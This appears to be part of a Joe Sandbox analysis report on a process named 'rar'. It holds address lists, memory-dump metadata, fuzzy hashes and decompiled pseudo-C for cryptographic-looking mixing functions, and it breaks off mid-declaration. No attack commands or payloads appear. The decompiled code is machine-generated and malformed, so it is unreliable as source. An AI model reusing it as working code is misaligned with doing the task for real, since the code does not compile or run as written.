                                                                                                            0x7ff650b3d76f
                                                                                                            0x7ff650b3d773
                                                                                                            0x7ff650b3d77c
                                                                                                            0x7ff650b3d77f
                                                                                                            0x7ff650b3d782
                                                                                                            0x7ff650b3d786
                                                                                                            0x7ff650b3d78d
                                                                                                            0x7ff650b3d798
                                                                                                            0x7ff650b3d7a6
                                                                                                            0x7ff650b3d7a8
                                                                                                            0x7ff650b3d7b6
                                                                                                            0x7ff650b3d7ba
                                                                                                            0x7ff650b3d7bf
                                                                                                            0x7ff650b3d7c8
                                                                                                            0x7ff650b3d7d2
                                                                                                            0x7ff650b3d7d7
                                                                                                            0x7ff650b3d7dc
                                                                                                            0x7ff650b3d7e1
                                                                                                            0x7ff650b3d7e4
                                                                                                            0x7ff650b3d7ef
                                                                                                            0x7ff650b3d7fc
                                                                                                            0x7ff650b3d801
                                                                                                            0x7ff650b3d806
                                                                                                            0x7ff650b3d80e
                                                                                                            0x7ff650b3d81a
                                                                                                            0x7ff650b3d81f
                                                                                                            0x7ff650b3d822
                                                                                                            0x7ff650b3d825
                                                                                                            0x7ff650b3d830
                                                                                                            0x7ff650b3d838
                                                                                                            0x7ff650b3d83f
                                                                                                            0x7ff650b3d84b
                                                                                                            0x7ff650b3d855
                                                                                                            0x7ff650b3d85b
                                                                                                            0x7ff650b3d864
                                                                                                            0x7ff650b3d86d
                                                                                                            0x7ff650b3d873
                                                                                                            0x7ff650b3d877
                                                                                                            0x7ff650b3d890
                                                                                                            0x7ff650b3d894
                                                                                                            0x7ff650b3d897
                                                                                                            0x7ff650b3d89a
                                                                                                            0x7ff650b3d89d
                                                                                                            0x7ff650b3d8a0
                                                                                                            0x7ff650b3d8a6
                                                                                                            0x7ff650b3d8ab
                                                                                                            0x7ff650b3d8b1
                                                                                                            0x7ff650b3d8b5
                                                                                                            0x7ff650b3d8bb
                                                                                                            0x7ff650b3d8c0
                                                                                                            0x7ff650b3d8c2
                                                                                                            0x7ff650b3d8c6
                                                                                                            0x7ff650b3d8cb
                                                                                                            0x7ff650b3d8cd
                                                                                                            0x7ff650b3d8d0
                                                                                                            0x7ff650b3d8de
                                                                                                            0x7ff650b3d8e2
                                                                                                            0x7ff650b3d8ef
                                                                                                            0x7ff650b3d8f5
                                                                                                            0x7ff650b3d8fd
                                                                                                            0x7ff650b3d909
                                                                                                            0x7ff650b3d90f
                                                                                                            0x7ff650b3d914
                                                                                                            0x7ff650b3d916
                                                                                                            0x7ff650b3d91a
                                                                                                            0x7ff650b3d91d
                                                                                                            0x7ff650b3d92b
                                                                                                            0x7ff650b3d92e
                                                                                                            0x7ff650b3d931
                                                                                                            0x7ff650b3d935
                                                                                                            0x7ff650b3d939
                                                                                                            0x7ff650b3d93d
                                                                                                            0x7ff650b3d941
                                                                                                            0x7ff650b3d945
                                                                                                            0x7ff650b3d949
                                                                                                            0x7ff650b3d94d
                                                                                                            0x7ff650b3d951
                                                                                                            0x7ff650b3d955
                                                                                                            0x7ff650b3d959
                                                                                                            0x7ff650b3d95d
                                                                                                            0x7ff650b3d964
                                                                                                            0x7ff650b3d96b
                                                                                                            0x7ff650b3d973
                                                                                                            0x7ff650b3d975
                                                                                                            0x7ff650b3d982
                                                                                                            0x7ff650b3d987
                                                                                                            0x7ff650b3d98e
                                                                                                            0x7ff650b3d992
                                                                                                            0x7ff650b3d996
                                                                                                            0x7ff650b3d99e
                                                                                                            0x7ff650b3d9a3
                                                                                                            0x7ff650b3d9ab
                                                                                                            0x7ff650b3d9b0
                                                                                                            0x7ff650b3d9b2
                                                                                                            0x7ff650b3d9b5
                                                                                                            0x7ff650b3d9b9
                                                                                                            0x7ff650b3d9c6
                                                                                                            0x7ff650b3d9c8
                                                                                                            0x7ff650b3d9d2
                                                                                                            0x7ff650b3d9d4
                                                                                                            0x7ff650b3d9d7
                                                                                                            0x7ff650b3d9e2
                                                                                                            0x7ff650b3d9e4
                                                                                                            0x7ff650b3d9e7
                                                                                                            0x7ff650b3d9fe
                                                                                                            0x7ff650b3da04
                                                                                                            0x7ff650b3da0a
                                                                                                            0x7ff650b3da12
                                                                                                            0x7ff650b3da15
                                                                                                            0x7ff650b3da22
                                                                                                            0x7ff650b3da36
                                                                                                            0x7ff650b3da39
                                                                                                            0x7ff650b3da3d
                                                                                                            0x7ff650b3da44
                                                                                                            0x7ff650b3da4a
                                                                                                            0x7ff650b3da57
                                                                                                            0x7ff650b3da5d
                                                                                                            0x7ff650b3da60
                                                                                                            0x7ff650b3da63
                                                                                                            0x7ff650b3da67
                                                                                                            0x7ff650b3da6b
                                                                                                            0x7ff650b3da7a
                                                                                                            0x7ff650b3da7c
                                                                                                            0x7ff650b3da7f
                                                                                                            0x7ff650b3da82
                                                                                                            0x7ff650b3da85
                                                                                                            0x7ff650b3da8a
                                                                                                            0x7ff650b3da8e
                                                                                                            0x7ff650b3da9f
                                                                                                            0x7ff650b3daa1
                                                                                                            0x7ff650b3daad
                                                                                                            0x7ff650b3daba
                                                                                                            0x7ff650b3dabf
                                                                                                            0x7ff650b3dac4
                                                                                                            0x7ff650b3daca
                                                                                                            0x7ff650b3dacd
                                                                                                            0x7ff650b3dad0
                                                                                                            0x7ff650b3dad4
                                                                                                            0x7ff650b3dae3
                                                                                                            0x7ff650b3dae6
                                                                                                            0x7ff650b3daf1
                                                                                                            0x7ff650b3daf7
                                                                                                            0x7ff650b3dafc
                                                                                                            0x7ff650b3db04
                                                                                                            0x7ff650b3db15
                                                                                                            0x7ff650b3db2e

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dfa6389a16a4ef0014ef05dc2c2055e7925bc246a1a0b63d1765bde6a4bb88cb
                                                                                                            • Instruction ID: b8b693b55cc7d76bfa1a073ee75127e1e26433779a9b994c7f9e498112c7824f
                                                                                                            • Opcode Fuzzy Hash: dfa6389a16a4ef0014ef05dc2c2055e7925bc246a1a0b63d1765bde6a4bb88cb
                                                                                                            • Instruction Fuzzy Hash: 67D1E472A18AC29BE761CF24E1807AD77A0F74A748F288135DB8E53745DF39E995CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B503E4 Relevance: .3, Instructions: 294COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: a3eaf8e18ec185674b74e6398a706a8bd1f3fa2afcc362ec38f37aa4f2420aea
                                                                                                            • Instruction ID: c687bfeb468a6865ba3b180667a993f04561ce72db8a42cffd72772be80d1de6
                                                                                                            • Opcode Fuzzy Hash: a3eaf8e18ec185674b74e6398a706a8bd1f3fa2afcc362ec38f37aa4f2420aea
                                                                                                            • Instruction Fuzzy Hash: D6C1E536A18A9695EB20CF25E8D03AD3760FB8AB94F441131DE5F97B95EF3DD0058B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1EC98 Relevance: .3, Instructions: 294COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E00007FF67FF650B1EC98(void* __eflags, long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r10) {
				signed int _t174;
				signed int _t175;
				signed int _t180;
				signed int _t181;
				signed int _t186;
				signed int _t192;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t205;
				signed int _t206;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t230;
				signed int _t233;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t246;
				signed int _t249;
				void* _t254;
				signed long long _t255;
				signed long long _t257;
				signed long long _t258;
				signed int* _t266;
				void* _t281;
				void* _t283;
				signed long long _t284;
				void* _t289;
				void* _t292;
				void* _t299;
				void* _t303;

				_t254 = _t283;
				 *((long long*)(_t254 + 0x10)) = __rbx;
				 *((long long*)(_t254 + 0x18)) = __rsi;
				 *((long long*)(_t254 + 0x20)) = __rdi;
				_push(_t299);
				_push(_t303);
				_t281 = _t254 - 0x5f;
				_t284 = _t283 - 0x100;
				_t255 =  *0x50b978f0; // 0x27db226282f1
				 *(_t281 + 0x27) = _t255 ^ _t284;
				 *((long long*)(_t281 - 0x69)) = __rcx;
				r8d = 0x40;
				E00007FF67FF650B6BAF0();
				_t257 =  *((intOrPtr*)(__rcx + 0xf8));
				_t264 =  *((intOrPtr*)(__rcx + 0x100));
				r9d = 2;
				r10d = r9d;
				asm("movups xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp-0x59], xmm0");
				asm("movups xmm0, [0x622e7]");
				asm("movups [ebp-0x49], xmm1");
				asm("movups [ebp-0x39], xmm0");
				 *(_t281 - 0x29 - _t264 + _t264) =  *(0x50b81010 -  *((intOrPtr*)(__rcx + 0x100)) +  *((intOrPtr*)(__rcx + 0x100))) ^  *_t264;
				if (__eflags != 0) goto 0x50b1ed21;
				_t266 =  *((intOrPtr*)(__rcx + 0x108));
				_t289 = _t281 - 0x21 - _t266;
				 *(_t289 + _t266) =  *(0x50b81018 + _t266) ^  *_t266;
				_t292 = __r9 - 1;
				if (__eflags != 0) goto 0x50b1ed4c;
				r15d =  *(_t281 - 0x1d);
				r14d =  *(_t281 - 0x21);
				r12d =  *(_t281 - 0x29);
				_t213 =  *(_t281 - 0x41);
				_t241 =  *(_t281 - 0x45);
				r13d =  *(_t281 - 0x49);
				 *((long long*)(_t281 - 0x79)) = 0x50b80f61;
				 *((long long*)(_t281 - 0x71)) = 0xa;
				 *(_t284 + 0x20) =  *(_t281 - 0x3d);
				r8d =  *(_t281 - 0x39);
				_t222 =  *(_t281 + _t257 * 4 - 0x19) + r13d +  *(_t281 - 0x59);
				r9d = _t222;
				r9d = r9d ^ r12d;
				r12d =  *(_t281 + _t257 * 4 - 0x19);
				asm("inc ecx");
				r8d = r8d + r9d;
				r10d = r8d;
				r10d = r10d ^ r13d;
				asm("inc ecx");
				r12d = r12d + r10d;
				r12d = r12d + _t222;
				_t174 = r12d ^ r9d;
				asm("ror eax, 0x8");
				 *(_t284 + 0x24) = _t174;
				_t175 = _t174 + r8d;
				r8d =  *(_t281 - 0x35);
				 *(_t284 + 0x30) = _t175;
				asm("ror eax, 0x7");
				 *(_t284 + 0x38) = _t175 ^ r10d;
				_t225 =  *(_t281 + _t257 * 4 - 0x19) + _t241 +  *(_t281 - 0x55);
				r9d = _t225;
				r9d = r9d ^  *(_t281 - 0x25);
				r13d =  *(_t281 + _t257 * 4 - 0x19);
				asm("inc ecx");
				r8d = r8d + r9d;
				r10d = r8d;
				r10d = r10d ^ _t241;
				asm("inc ecx");
				r13d = r13d + r10d;
				r13d = r13d + _t225;
				_t180 = r13d ^ r9d;
				asm("ror eax, 0x8");
				 *(_t284 + 0x2c) = _t180;
				_t181 = _t180 + r8d;
				r8d =  *(_t281 - 0x31);
				 *(_t284 + 0x40) = _t181;
				_t246 = _t181 ^ r10d;
				asm("ror esi, 0x7");
				_t228 =  *(_t281 + _t257 * 4 - 0x19) + _t213 +  *(_t281 - 0x51);
				r9d = _t228;
				r9d = r9d ^ r14d;
				asm("inc ecx");
				r8d = r8d + r9d;
				r10d = r8d;
				r10d = r10d ^ _t213;
				asm("inc ecx");
				_t186 =  *(_t281 + _t257 * 4 - 0x19) + r10d + _t228;
				 *(_t284 + 0x28) = _t186;
				asm("ror eax, 0x8");
				 *(_t284 + 0x3c) = _t186 ^ r9d;
				r14d = _t257 + _t289;
				r14d = r14d ^ r10d;
				asm("inc ecx");
				_t230 =  *(_t281 - 0x4d) +  *(_t281 + _t257 * 4 - 0x19) +  *(_t284 + 0x20);
				r9d = _t230;
				r9d = r9d ^ r15d;
				r8d =  *(_t281 - 0x2d);
				asm("inc ecx");
				r8d = r8d + r9d;
				r10d = r8d;
				r10d = r10d ^  *(_t284 + 0x20);
				asm("inc ecx");
				_t192 =  *(_t281 + _t257 * 4 - 0x19) + r10d + _t230;
				r11d = _t192;
				 *(_t284 + 0x34) = _t192;
				_t258 =  *((intOrPtr*)(_t281 - 0x79));
				r11d = r11d ^ r9d;
				asm("inc ecx");
				r15d = 0x50b80f61 + _t289;
				r15d = r15d ^ r10d;
				asm("inc ecx");
				_t233 =  *(_t281 + _t258 * 4 - 0x19) + _t246 + r12d;
				r8d = _t233;
				r8d = r8d ^ r11d;
				asm("inc ecx");
				r9d = _t289 + __rcx;
				r10d = r9d;
				r10d = r10d ^ _t246;
				asm("inc ecx");
				_t197 =  *(_t281 + _t258 * 4 - 0x19) + r10d + _t233;
				 *(_t281 - 0x59) = _t197;
				_t198 = _t197 ^ r8d;
				asm("ror eax, 0x8");
				 *(_t284 + 0x48) = _t198;
				 *(_t281 - 0x1d) = _t198;
				_t199 = _t198 + r9d;
				r10d = r10d ^ _t199;
				 *(_t281 - 0x31) = _t199;
				asm("inc ecx");
				 *(_t284 + 0x44) = r10d;
				 *(_t281 - 0x45) = r10d;
				r8d =  *(_t281 + _t258 * 4 - 0x19);
				r8d = r8d + r14d;
				r8d = r8d + r13d;
				r12d =  *(_t281 + _t258 * 4 - 0x19);
				asm("rol edx, 0x10");
				r9d = 0x50b81018 + __rdi;
				_t216 = r9d ^ r14d;
				asm("ror ebx, 0xc");
				r12d = r12d + _t216;
				r12d = r12d + r8d;
				 *(_t281 - 0x55) = r12d;
				r12d = r12d ^ r8d ^  *(_t284 + 0x24);
				asm("inc ecx");
				_t202 = _t292 + _t299;
				r9d =  *(_t284 + 0x30);
				 *(_t281 - 0x2d) = _t202;
				asm("ror ebx, 0x7");
				r8d =  *(_t281 + _t258 * 4 - 0x19);
				r8d = r8d + r15d;
				r8d = r8d +  *(_t284 + 0x28);
				_t237 = r8d ^  *(_t284 + 0x2c);
				asm("rol edx, 0x10");
				r9d = r9d + _t237;
				r10d = r9d;
				r10d = r10d ^ r15d;
				asm("inc ecx");
				r15d =  *(_t284 + 0x48);
				_t249 =  *(_t281 + _t258 * 4 - 0x19) + r10d + r8d;
				 *(_t281 - 0x51) = _t249;
				asm("ror esi, 0x8");
				_t205 = _t292 + __rsi;
				r9d =  *(_t284 + 0x40);
				 *(_t281 - 0x39) = _t205;
				_t206 = _t205 ^ r10d;
				asm("ror eax, 0x7");
				 *(_t284 + 0x20) = _t206;
				 *(_t281 - 0x3d) = _t206;
				r8d =  *(_t281 + _t258 * 4 - 0x19);
				r8d = r8d +  *(_t284 + 0x34);
				r8d = r8d +  *(_t284 + 0x38);
				 *((long long*)(_t281 - 0x79)) =  *((intOrPtr*)(_t281 - 0x79)) + 0x10;
				_t239 = r8d ^  *(_t284 + 0x3c);
				r14d =  *(_t281 + _t258 * 4 - 0x19);
				asm("rol edx, 0x10");
				r9d = r9d + _t239;
				r10d = r9d;
				r10d = r10d ^  *(_t284 + 0x38);
				asm("inc ecx");
				r14d = r14d + r10d;
				r14d = r14d + r8d;
				 *(_t281 - 0x4d) = r14d;
				r14d = r14d ^ _t239;
				asm("inc ecx");
				_t209 = _t292 + _t303;
				r13d = _t209;
				 *(_t281 - 0x35) = _t209;
				r13d = r13d ^ r10d;
				asm("inc ecx");
				 *((long long*)(_t281 - 0x71)) =  *((long long*)(_t281 - 0x71)) - 1;
				if (__eflags != 0) goto 0x50b1ed92;
				 *(_t281 - 0x41) = _t216 ^ _t202;
				 *(_t281 - 0x21) = r14d;
				 *(_t281 - 0x25) = _t249 ^ _t237;
				 *(_t281 - 0x29) = r12d;
				 *(_t281 - 0x49) = r13d;
				 *(0x50b81018 +  *((intOrPtr*)( *((intOrPtr*)(_t281 - 0x69)) + 0xf8))) =  *(0x50b81018 +  *((intOrPtr*)( *((intOrPtr*)(_t281 - 0x69)) + 0xf8))) ^  *(_t281 + 0x7ff650b80fdf) ^  *(_t281 + 0x7ff650b80fbf);
				if (0x50b81018 - _t266 + 4 - 0x20 < 0) goto 0x50b1f084;
				return E00007FF67FF650B69D10( *(_t281 + 0x7ff650b80fdf) ^  *(_t281 + 0x7ff650b80fbf),  *(_t281 + _t257 * 4 - 0x19) +  *(_t284 + 0x20),  *(_t281 + 0x27) ^ _t284);
			}








































                                                                                                            0x7ff650b1ec98
                                                                                                            0x7ff650b1ec9b
                                                                                                            0x7ff650b1ec9f
                                                                                                            0x7ff650b1eca3
                                                                                                            0x7ff650b1eca8
                                                                                                            0x7ff650b1ecac
                                                                                                            0x7ff650b1ecb0
                                                                                                            0x7ff650b1ecb4
                                                                                                            0x7ff650b1ecbb
                                                                                                            0x7ff650b1ecc5
                                                                                                            0x7ff650b1eccc
                                                                                                            0x7ff650b1ecd4
                                                                                                            0x7ff650b1ecda
                                                                                                            0x7ff650b1ecdf
                                                                                                            0x7ff650b1eced
                                                                                                            0x7ff650b1ecfb
                                                                                                            0x7ff650b1ed04
                                                                                                            0x7ff650b1ed07
                                                                                                            0x7ff650b1ed0a
                                                                                                            0x7ff650b1ed0e
                                                                                                            0x7ff650b1ed12
                                                                                                            0x7ff650b1ed19
                                                                                                            0x7ff650b1ed1d
                                                                                                            0x7ff650b1ed26
                                                                                                            0x7ff650b1ed32
                                                                                                            0x7ff650b1ed34
                                                                                                            0x7ff650b1ed49
                                                                                                            0x7ff650b1ed51
                                                                                                            0x7ff650b1ed59
                                                                                                            0x7ff650b1ed5d
                                                                                                            0x7ff650b1ed69
                                                                                                            0x7ff650b1ed6d
                                                                                                            0x7ff650b1ed74
                                                                                                            0x7ff650b1ed78
                                                                                                            0x7ff650b1ed7b
                                                                                                            0x7ff650b1ed7e
                                                                                                            0x7ff650b1ed82
                                                                                                            0x7ff650b1ed86
                                                                                                            0x7ff650b1ed8e
                                                                                                            0x7ff650b1ed97
                                                                                                            0x7ff650b1eda6
                                                                                                            0x7ff650b1eda9
                                                                                                            0x7ff650b1edac
                                                                                                            0x7ff650b1edaf
                                                                                                            0x7ff650b1edb4
                                                                                                            0x7ff650b1edb8
                                                                                                            0x7ff650b1edbb
                                                                                                            0x7ff650b1edbe
                                                                                                            0x7ff650b1edc1
                                                                                                            0x7ff650b1edc5
                                                                                                            0x7ff650b1edc8
                                                                                                            0x7ff650b1edce
                                                                                                            0x7ff650b1edd1
                                                                                                            0x7ff650b1edd4
                                                                                                            0x7ff650b1edd8
                                                                                                            0x7ff650b1eddb
                                                                                                            0x7ff650b1eddf
                                                                                                            0x7ff650b1ede6
                                                                                                            0x7ff650b1ede9
                                                                                                            0x7ff650b1edfd
                                                                                                            0x7ff650b1ee00
                                                                                                            0x7ff650b1ee03
                                                                                                            0x7ff650b1ee06
                                                                                                            0x7ff650b1ee0b
                                                                                                            0x7ff650b1ee0f
                                                                                                            0x7ff650b1ee12
                                                                                                            0x7ff650b1ee15
                                                                                                            0x7ff650b1ee18
                                                                                                            0x7ff650b1ee1c
                                                                                                            0x7ff650b1ee1f
                                                                                                            0x7ff650b1ee25
                                                                                                            0x7ff650b1ee28
                                                                                                            0x7ff650b1ee2b
                                                                                                            0x7ff650b1ee2f
                                                                                                            0x7ff650b1ee32
                                                                                                            0x7ff650b1ee38
                                                                                                            0x7ff650b1ee3c
                                                                                                            0x7ff650b1ee44
                                                                                                            0x7ff650b1ee52
                                                                                                            0x7ff650b1ee55
                                                                                                            0x7ff650b1ee58
                                                                                                            0x7ff650b1ee5f
                                                                                                            0x7ff650b1ee63
                                                                                                            0x7ff650b1ee66
                                                                                                            0x7ff650b1ee69
                                                                                                            0x7ff650b1ee6c
                                                                                                            0x7ff650b1ee73
                                                                                                            0x7ff650b1ee78
                                                                                                            0x7ff650b1ee7f
                                                                                                            0x7ff650b1ee82
                                                                                                            0x7ff650b1ee8f
                                                                                                            0x7ff650b1ee92
                                                                                                            0x7ff650b1ee95
                                                                                                            0x7ff650b1eea1
                                                                                                            0x7ff650b1eea3
                                                                                                            0x7ff650b1eea6
                                                                                                            0x7ff650b1eeae
                                                                                                            0x7ff650b1eeb2
                                                                                                            0x7ff650b1eeb6
                                                                                                            0x7ff650b1eebd
                                                                                                            0x7ff650b1eec0
                                                                                                            0x7ff650b1eec5
                                                                                                            0x7ff650b1eecc
                                                                                                            0x7ff650b1eece
                                                                                                            0x7ff650b1eed1
                                                                                                            0x7ff650b1eed5
                                                                                                            0x7ff650b1eed9
                                                                                                            0x7ff650b1eedc
                                                                                                            0x7ff650b1eee8
                                                                                                            0x7ff650b1eeeb
                                                                                                            0x7ff650b1eef4
                                                                                                            0x7ff650b1eef8
                                                                                                            0x7ff650b1eefb
                                                                                                            0x7ff650b1eefe
                                                                                                            0x7ff650b1ef05
                                                                                                            0x7ff650b1ef0e
                                                                                                            0x7ff650b1ef12
                                                                                                            0x7ff650b1ef15
                                                                                                            0x7ff650b1ef1c
                                                                                                            0x7ff650b1ef23
                                                                                                            0x7ff650b1ef25
                                                                                                            0x7ff650b1ef28
                                                                                                            0x7ff650b1ef2b
                                                                                                            0x7ff650b1ef2e
                                                                                                            0x7ff650b1ef32
                                                                                                            0x7ff650b1ef35
                                                                                                            0x7ff650b1ef38
                                                                                                            0x7ff650b1ef3b
                                                                                                            0x7ff650b1ef43
                                                                                                            0x7ff650b1ef47
                                                                                                            0x7ff650b1ef4c
                                                                                                            0x7ff650b1ef50
                                                                                                            0x7ff650b1ef5a
                                                                                                            0x7ff650b1ef5d
                                                                                                            0x7ff650b1ef67
                                                                                                            0x7ff650b1ef6c
                                                                                                            0x7ff650b1ef6f
                                                                                                            0x7ff650b1ef76
                                                                                                            0x7ff650b1ef79
                                                                                                            0x7ff650b1ef7c
                                                                                                            0x7ff650b1ef7f
                                                                                                            0x7ff650b1ef82
                                                                                                            0x7ff650b1ef86
                                                                                                            0x7ff650b1ef89
                                                                                                            0x7ff650b1ef8d
                                                                                                            0x7ff650b1ef91
                                                                                                            0x7ff650b1ef98
                                                                                                            0x7ff650b1efa0
                                                                                                            0x7ff650b1efa3
                                                                                                            0x7ff650b1efad
                                                                                                            0x7ff650b1efb0
                                                                                                            0x7ff650b1efb8
                                                                                                            0x7ff650b1efbc
                                                                                                            0x7ff650b1efbf
                                                                                                            0x7ff650b1efc2
                                                                                                            0x7ff650b1efc5
                                                                                                            0x7ff650b1efc8
                                                                                                            0x7ff650b1efd7
                                                                                                            0x7ff650b1efdc
                                                                                                            0x7ff650b1efdf
                                                                                                            0x7ff650b1efe4
                                                                                                            0x7ff650b1efe7
                                                                                                            0x7ff650b1efeb
                                                                                                            0x7ff650b1eff0
                                                                                                            0x7ff650b1eff3
                                                                                                            0x7ff650b1eff6
                                                                                                            0x7ff650b1eff9
                                                                                                            0x7ff650b1effd
                                                                                                            0x7ff650b1f005
                                                                                                            0x7ff650b1f013
                                                                                                            0x7ff650b1f018
                                                                                                            0x7ff650b1f020
                                                                                                            0x7ff650b1f024
                                                                                                            0x7ff650b1f028
                                                                                                            0x7ff650b1f02d
                                                                                                            0x7ff650b1f030
                                                                                                            0x7ff650b1f033
                                                                                                            0x7ff650b1f036
                                                                                                            0x7ff650b1f03b
                                                                                                            0x7ff650b1f03f
                                                                                                            0x7ff650b1f042
                                                                                                            0x7ff650b1f045
                                                                                                            0x7ff650b1f049
                                                                                                            0x7ff650b1f04c
                                                                                                            0x7ff650b1f050
                                                                                                            0x7ff650b1f054
                                                                                                            0x7ff650b1f057
                                                                                                            0x7ff650b1f05a
                                                                                                            0x7ff650b1f05d
                                                                                                            0x7ff650b1f061
                                                                                                            0x7ff650b1f066
                                                                                                            0x7ff650b1f072
                                                                                                            0x7ff650b1f075
                                                                                                            0x7ff650b1f079
                                                                                                            0x7ff650b1f07c
                                                                                                            0x7ff650b1f080
                                                                                                            0x7ff650b1f093
                                                                                                            0x7ff650b1f09e
                                                                                                            0x7ff650b1f0cc

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4ea870e85e21782323342ba216032aa6753ba66b0c5bbe6a55367380f08b109
                                                                                                            • Instruction ID: f53cda586bcfb144d3ecfd3f87057cc689c1587f130cb831f88f0d5a0f223d4b
                                                                                                            • Opcode Fuzzy Hash: b4ea870e85e21782323342ba216032aa6753ba66b0c5bbe6a55367380f08b109
                                                                                                            • Instruction Fuzzy Hash: 80C1BD77B281908FE350CF7AE440A9D3BB1F38878CB559125EF59A3B09D639E645CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B30494 Relevance: .3, Instructions: 292COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 56%
                                                                                                            			E00007FF67FF650B30494(signed int __ebx, void* __ecx, void* __edx, signed int __edi, void* __rax, void* __rbx, signed int* __rdi, signed long long __rsi, void* __r9, long long __r14, long long __r15) {
				void* _t392;
				void* _t394;
				signed char _t431;
				void* _t448;
				char _t458;
				signed int _t471;
				void* _t487;
				signed char _t490;
				void* _t506;
				signed int _t510;
				void* _t515;
				void* _t521;
				signed int _t529;
				signed int _t533;
				signed int _t539;
				signed char _t541;
				signed int _t544;
				signed int _t622;
				void* _t625;
				signed int _t626;
				signed int _t628;
				signed int _t630;
				signed int _t633;
				void* _t637;
				void* _t638;
				void* _t683;
				void* _t690;
